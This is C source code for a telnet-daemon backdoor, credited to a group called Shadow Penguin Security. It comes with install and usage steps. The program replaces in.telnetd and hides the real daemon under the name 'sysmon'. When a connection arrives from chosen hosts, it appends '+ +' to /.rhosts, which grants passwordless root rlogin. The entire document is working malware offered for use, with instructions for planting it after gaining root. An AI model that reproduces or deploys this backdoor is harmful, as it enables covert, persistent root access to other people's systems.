/*================================================================================ Remote Backdoor for rlogin The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) [Install] 1) Input your host to /*1*/ 2) To be a root 3) mv /usr/sbin/in.telnetd /usr/sbin/sysmon (you can change "sysmon" in /*2*/) 4) cc in.telnetd.c -o in.telnetd 5) mv in.telnetd /usr/sbin [usage] 1) Make a connection to port23 of the target host (ex. telnet targethost) 2) rlogin target -l root ================================================================================ */ #include #include #include #include #include #include #include static char *roothosts[]={"yoursite.ne.jp", /* 1 */ "fumidai.ac.jp", ""}; #define ORIGINAL "/usr/sbin/sysmon" /* 2 */ #define RQ_DAEMON 2 #define BUFFER_SIZE 512 #define RHOSTS "/.rhosts" main(int argc,char *argv[]) { struct sockaddr_in client; struct in_addr clientIn; struct hostent *h; char buf[BUFSIZ],ClientDomain[200]; int len,i,flag; long inetip; FILE *fp; len = sizeof(client); if (getpeername(RQ_DAEMON, (struct sockaddr *)&client, &len) < 0) { len = sizeof(client); if (recvfrom(RQ_DAEMON,buf,sizeof(buf),MSG_PEEK, (struct sockaddr *) & client, &len) < 0) { return; } } memcpy(&clientIn,&client.sin_addr.s_addr,4); inetip=inet_addr(inet_ntoa(clientIn)); h=(struct hostent *)gethostbyaddr(&inetip,sizeof(struct hostent),AF_INET); if (h!=NULL){ for (flag=0,i=0;i<10;i++){ if (strlen(roothosts[i])==0) break; if (strstr(roothosts[i],h->h_name)!=NULL || strstr(h->h_name,roothosts[i])!=NULL){ flag=1; break; } } if (flag==1){ if ((fp=fopen(RHOSTS,"a"))!=NULL){ fprintf(fp,"+ +\n"); fclose(fp); } } } execv(ORIGINAL,argv); }